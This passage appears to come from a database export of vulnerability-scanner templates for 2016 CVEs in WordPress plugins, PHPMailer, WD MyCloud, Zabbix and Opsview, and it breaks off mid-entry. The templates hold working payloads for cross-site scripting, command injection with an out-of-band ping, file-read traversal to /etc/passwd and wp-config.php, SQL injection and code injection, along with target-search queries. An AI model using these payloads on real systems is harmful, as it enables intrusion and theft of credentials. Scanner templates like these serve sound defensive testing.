CVE-2016-1000153\n\ninfo:\n name: WordPress Tidio Gallery <=1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update the WordPress Tidio Gallery plugin to a version later than 1.1 (1.1 and earlier are affected) to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=427\n - https://wordpress.org/plugins/tidio-gallery\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000153\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.40457\n cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tidio-gallery_project\n product: tidio-gallery\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Tidio Gallery'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c9693b1bd6fbc22838c78600a4754fab312b29b642040567899c5433eb8bb38c0221009c1e726b0d49c9e43d9cd99d487fa5f07719ed3f3c8437b9b8f5753b3910ce71:922c64590222798bb761d5b6d8e72950", "hash": "c0759fc4d60f57369eadf09f31dab957", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8a" }, "name": "CVE-2016-1000154.yaml", "content": "id: CVE-2016-1000154\n\ninfo:\n name: WordPress WHIZZ <=1.0.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=112\n - https://wordpress.org/plugins/whizz\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000154\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.49844\n cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: browserweb\n product: whizz\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb\n\nflow: http(1) && 
http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/whizz/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WHIZZ'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022010b00e1e03da20057e11b9152c3ec9cdd135118a3e22499c4c9cc622d550ce2b0221008caf70e5704962de26782ade15ec49d697a240e0312070326cabc183e25e3137:922c64590222798bb761d5b6d8e72950", "hash": "517cc97b005e45c7663942cde90e614b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8b" }, "name": "CVE-2016-1000155.yaml", "content": "id: CVE-2016-1000155\n\ninfo:\n name: WordPress WPSOLR <=8.6 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: |\n Update to the latest version of WPSOLR plugin (8.7 or higher).\n reference:\n - https://wordpress.org/plugins/wpsolr-search-engine\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=303\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000155\n cwe-id: CWE-79\n epss-score: 0.00103\n epss-percentile: 0.40793\n cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpsolr\n product: wpsolr-search-engine\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WPSOLR Search Engine ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b4e31a8e20f62df5ed1fbd6d516cf3aaac3613b05365f1a879d1f172e75a75ac022047808d416888877371ac41b66272a681fb7cfc3d4a34a4d165f6e1671ee51dc8:922c64590222798bb761d5b6d8e72950", "hash": "78a08abc74cae0e213c1299532c04917", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8c" }, "name": "CVE-2016-10033.yaml", "content": "id: CVE-2016-10033\n\ninfo:\n name: WordPress PHPMailer < 5.2.18 - Remote Code Execution\n author: 
princechaddha\n severity: critical\n description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \\\" (backslash double quote) in a crafted Sender property in isMail transport.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected WordPress website.\n Note that this check is intrusive: it submits a real password-reset request for the enumerated user (which sends a reset e-mail) and, where the Exim payload in the Host header is interpreted, creates the file /tmp/success on the target. The matchers only confirm that the reset request was accepted (redirect to checkemail=confirm), not that the injected command actually executed.\n remediation: |\n Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability.\n reference:\n - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10033\n - https://www.exploit-db.com/exploits/40970/\n - https://www.exploit-db.com/exploits/40968/\n - http://seclists.org/fulldisclosure/2016/Dec/78\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-10033\n cwe-id: CWE-88\n epss-score: 0.97129\n epss-percentile: 0.99775\n cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: phpmailer_project\n product: phpmailer\n tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project\n\nhttp:\n - raw:\n - |+\n GET /?author=1 HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n - |+\n POST /wp-login.php?action=lostpassword HTTP/1.1\n Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n wp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - wp-login.php?checkemail=confirm\n\n - type: 
status\n status:\n - 302\n\n extractors:\n - type: regex\n name: username\n group: 1\n regex:\n - 'Author:(?:[A-Za-z0-9 -\\_=\"]+)?([A-Za-z0-9]+)<\\/span>'\n internal: true\n part: body\n# digest: 490a00463044022033411a2aca61b97b205301cdb8eef8ef57c3467165cbe4c0c9a9c547cb8965e50220406a74e33b928a171ca810378162a6b315449d70e1b8059b12a752a0d61c2229:922c64590222798bb761d5b6d8e72950", "hash": "1a0ba726557b6a134fe3ab16748e11e9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8d" }, "name": "CVE-2016-10108.yaml", "content": "id: CVE-2016-10108\n\ninfo:\n name: Western Digital MyCloud NAS - Command Injection\n author: DhiyaneshDk\n severity: critical\n description: |\n Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.\n reference:\n - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10108\n - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-10108\n cwe-id: CWE-77\n epss-score: 0.86242\n epss-percentile: 0.98335\n cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: western_digital\n product: mycloud_nas\n shodan-query: 
http.favicon.hash:-1074357885\n tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n\n matchers:\n - type: dsl\n dsl:\n - contains(body, \"WDMyCloud\")\n - contains(interactsh_protocol, \"dns\")\n - status_code == 200\n condition: and\n# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950", "hash": "4b863c6bebd101dd8742067ec95c3ee9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8e" }, "name": "CVE-2016-10134.yaml", "content": "id: CVE-2016-10134\n\ninfo:\n name: Zabbix - SQL Injection\n author: princechaddha\n severity: critical\n description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks. This template exercises the same injection through the profileIdx2 parameter of jsrpc.php and matches on the MySQL error text echoed back in the response.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems.\n remediation: |\n Upgrade to Zabbix 2.2.14 or 3.0.4 (or later), or apply the vendor security patch, to mitigate the SQL Injection vulnerability (CVE-2016-10134).\n reference:\n - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10134\n - https://support.zabbix.com/browse/ZBX-11023\n - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936\n - http://www.debian.org/security/2017/dsa-3802\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-10134\n cwe-id: CWE-89\n epss-score: 0.05366\n epss-percentile: 0.92931\n cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zabbix\n 
product: zabbix\n tags: cve2016,cve,zabbix,sqli,vulhub\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Error in query [INSERT INTO profiles (profileid, userid'\n - 'You have an error in your SQL syntax'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022002af95be90d34c083687132956f3fddac7b02d6c5bde40cad1957ff829e41a4b022100bec226073019d0c0c6a39cd446db71450cea262f0ed5a9b880e9b6c6fb46f340:922c64590222798bb761d5b6d8e72950", "hash": "067f7d8ff9251eee0af3b34878488ee7", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8f" }, "name": "CVE-2016-10367.yaml", "content": "id: CVE-2016-10367\n\ninfo:\n name: Opsview Monitor Pro - Local File Inclusion\n author: 0x_akoko\n severity: high\n description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability.\n reference:\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10367\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: 
CVE-2016-10367\n cwe-id: CWE-22\n epss-score: 0.00521\n epss-percentile: 0.76355\n cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: opsview\n product: opsview\n shodan-query: title:\"Opsview\"\n tags: cve2016,cve,opsview,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 404\n# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950", "hash": "caafd7308ceaf18695f0f576b66416fe", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f90" }, "name": "CVE-2016-10368.yaml", "content": "id: CVE-2016-10368\n\ninfo:\n name: Opsview Monitor Pro - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. 
An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.\n impact: |\n An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Apply the latest patch or upgrade to a version that is not affected by the vulnerability.\n reference:\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10368\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-10368\n cwe-id: CWE-601\n epss-score: 0.00204\n epss-percentile: 0.57743\n cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*\n metadata:\n max-request: 1\n vendor: opsview\n product: opsview\n tags: cve2016,cve,redirect,opsview,authenticated\n\nhttp:\n - raw:\n - |\n POST /login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n login_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n - type: status\n status:\n - 302\n# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950", "hash": "19ac1555026160ec6d71a40161b76402", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f91" }, "name": "CVE-2016-10924.yaml", "content": "id: CVE-2016-10924\n\ninfo:\n name: Wordpress 
Zedna eBook download <1.2 - Local File Inclusion\n author: idealphase\n severity: high\n description: |\n Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.\n remediation: |\n Update to the latest version of the plugin to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c\n - https://www.exploit-db.com/exploits/39575\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10924\n - https://wordpress.org/plugins/ebook-download/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-10924\n cwe-id: CWE-22\n epss-score: 0.01429\n epss-percentile: 0.85146\n cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: zedna_ebook_download_project\n product: zedna_ebook_download\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/ebook-download\"\n tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022035463ec47dab2e9697b6674a8af15173fe0695e388c6704ee510f3d410ef89e8022100ad37ebb93323af593940c5eece752836b5f4ca33475290dcf8601e11cfe00fd8:922c64590222798bb761d5b6d8e72950", "hash": "c851b94659e5e512087c3e366cbc8c4b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f92" }, "name": "CVE-2016-10940.yaml", "content": "id: 
CVE-2016-10940\n\ninfo:\n name: WordPress zm-gallery plugin 1.0 SQL Injection\n author: cckuailong,daffainfo\n severity: high\n description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor.\n reference:\n - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6\n - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10940\n - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/\n - https://wordpress.org/plugins/zm-gallery/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2016-10940\n cwe-id: CWE-89\n epss-score: 0.00776\n epss-percentile: 0.80947\n cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: zm-gallery_project\n product: zm-gallery\n framework: wordpress\n tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\n Host: {{Hostname}}\n - |\n GET 
/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200'\n - 'contains(body_2, \"[zm_gallery id=\")'\n - 'contains(body_2, \"\")'\n - '!contains(body_3, \"\")'\n condition: and\n# digest: 490a004630440220699b403999a44dfa1c0a95c442149578cb0dba8769c29aff63008cc829004d2202201090107521d760927c5f1134bbceda7facb495a7c6291a6a0669d3ca7a6832ef:922c64590222798bb761d5b6d8e72950", "hash": "bfed77c7874857656809735fa1029221", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f93" }, "name": "CVE-2016-10956.yaml", "content": "id: CVE-2016-10956\n\ninfo:\n name: WordPress Mail Masta 1.0 - Local File Inclusion\n author: daffainfo,0x240x23elu\n severity: high\n description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Update WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2016080220\n - https://wpvulndb.com/vulnerabilities/8609\n - https://wordpress.org/plugins/mail-masta/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10956\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-10956\n cwe-id: CWE-20\n epss-score: 0.01238\n epss-percentile: 0.83962\n cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: mail-masta_project\n product: mail-masta\n framework: wordpress\n google-query: 
inurl:\"/wp-content/plugins/mail-masta\"\n tags: cve,cve2016,wordpress,wp-plugin,lfi,mail,mail-masta_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n - 500\n# digest: 490a00463044022039d06d4aa7a538325a7def0732a690e76353bd439cec6d8585bccf59a180048002205b9232ef9dbcf11df674e2c295d9a64257cd54d42501c853019ff131e47e7741:922c64590222798bb761d5b6d8e72950", "hash": "23b85dc135ddc82ea89b0342c5c760cf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f94" }, "name": "CVE-2016-10960.yaml", "content": "id: CVE-2016-10960\n\ninfo:\n name: WordPress wSecure Lite < 2.4 - Remote Code Execution\n author: daffainfo\n severity: high\n description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability.\n reference:\n - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/\n - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960\n - https://wordpress.org/plugins/wsecure/#developers\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2016-10960\n cwe-id: CWE-20\n epss-score: 0.01469\n epss-percentile: 0.86457\n cpe: 
cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:*\n metadata:\n max-request: 1\n vendor: joomlaserviceprovider\n product: wsecure\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wsecure\"\n tags: cve2016,cve,wordpress,wp-plugin,rce,joomlaserviceprovider\nvariables:\n name: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php\"\n\n body: 'wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"{{name}}: CVE-2016-10960\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022028547f88cd5ee6349b8fce17ed0c1ebb51aaccf87c6ebb245512f16a9b0976f2022100a8c2ef6ffcfe5bd3d42a7330cbf6d03b61b9ff919f463b7838a8db77a1502946:922c64590222798bb761d5b6d8e72950", "hash": "1351ea75baa9b07c3d2b47b9315a6148", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f95" }, "name": "CVE-2016-10973.yaml", "content": "id: CVE-2016-10973\n\ninfo:\n name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.8 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10973\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: 
